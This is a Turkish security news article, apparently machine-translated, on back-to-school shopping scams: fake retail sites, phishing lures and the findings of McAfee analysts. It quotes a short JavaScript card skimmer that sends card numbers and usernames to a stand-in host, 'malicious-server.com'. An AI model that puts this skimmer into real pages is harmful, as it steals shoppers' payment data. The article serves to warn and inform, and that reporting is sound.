Hileler, kullanıcıları sahte alışveriş sitelerine iten yeni okula dönüş alışveriş dolandırıcılarına dikkat edin


Hileler, kullanıcıları sahte alışveriş sitelerine iten yeni okula dönüş alışveriş dolandırıcılarına dikkat edin

Ülke genelindeki aileler okula dönüşe hazırlanırken, siber suçlular yeni bir sofistike alışveriş dolandırıcılığı dalgası ile mevsimsel acele kullanıyorlar.

Çevrimiçi harcamalarda zirvelerden yararlanan dolandırıcılar, tedarik anlaşmaları ve özel teklifler arayan şüphesiz kullanıcıları avlayan kötü amaçlı kampanyalar kullanıyor.

Bu dolandırıcıların ortaya çıkışı, sahte perakende web sitelerinin, manipüle edilmiş teslimat bildirimlerinin ve akıllı kimlik avı yemlerinin artan raporlarıyla çakışıyor – hepsi kişisel ve ödeme kimlik bilgilerini hasat etmek için titizlikle tasarlandı.

Google Haberleri

Bu yılki kampanya, sponsorlu arama yerleşimleri, e -posta promosyonları ve en önemlisi sosyal medya reklamları yoluyla yaygın olarak yayılan inandırıcı hazırlanmış sahte sitelerin konuşlandırılmasıyla kendini ayırıyor.

Bu sahte reklamlar, AI odaklı görseller kullanarak saygın perakendecileri taklit etmek için Classroom Essentials’tan Big-bilet elektroniğine kadar her şey için çekici fırsatlara sahiptir.

Bu sitelerin sunduğu kesintisiz deneyim, hileli niyetlerine inanıyor, birçok kurban sadece fonlar kaybolduktan veya özel verilerden ödün verildikten sonra aldatmayı fark ediyor.

McAfee analistleri, kullanıcı raporlarında ve tehdit telemetrisinde belirgin bir artışın ardından Ağustos ayı başında bu koordineli tehdit artışını belirledi.

Araştırmaları, bu dolandırıcıların çok sayıda sahte alışveriş portalını hızla döndürmek için otomatik platformlar kullandığını ortaya koydu.

Her site, görünür meşruiyeti desteklemek için randomize etki alanı kayıtları ve SSL sertifikaları kullanılarak temel algılamadan kaçacak şekilde tasarlanmıştır.

Bu teknik ploylar, sosyal platformlarda agresif tanıtımla birleştiğinde, kötü niyetli altyapı yoluyla yüksek miktarda web trafiğini huni.

McAfee araştırmacıları tarafından ortaya çıkarılan özellikle sinsi bir teknik vektör, ödeme sayfalarına gömülü arka uç JavaScript yüklerini içerir.

Form gönderildikten sonra, bu komut dosyaları, saldırgan kontrollü sunuculara hasat edilen kredi kartı numaralarını ve giriş bilgilerini görünmez bir şekilde aktarır ve genellikle temel ağ filtrelerini atlatmak için iletimleri şifreler.

Gömülü yük, aşağıdaki gizlenmiş desene benzemektedir:-

(function(){
  var xhr=new XMLHttpRequest();
  xhr.open('POST','https://malicious-server.com/collect',true);
  xhr.setRequestHeader('Content-Type','application/json');
  xhr.send(JSON.stringify({card:document.getElementById('cc_num').value,user:document.getElementById('usr').value}));
})();

Bu yaklaşım sadece anında kimlik bilgisi eksfiltrasyonunu sağlamakla kalmaz, aynı zamanda saldırganlara daha fazla hesap uzlaşması için kalıcı bir taban sağlar.

Okula dönüş sezonu devam ettikçe, kullanıcılar-özellikle tanıdık olmayan perakendeciler ve acil promosyon reklamları tarafından ikna edilen kullanıcılar-bu tür ileri ve gelişen dolandırıcılıklar için ana hedefleri yeniden canlandırıyor.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.



Source link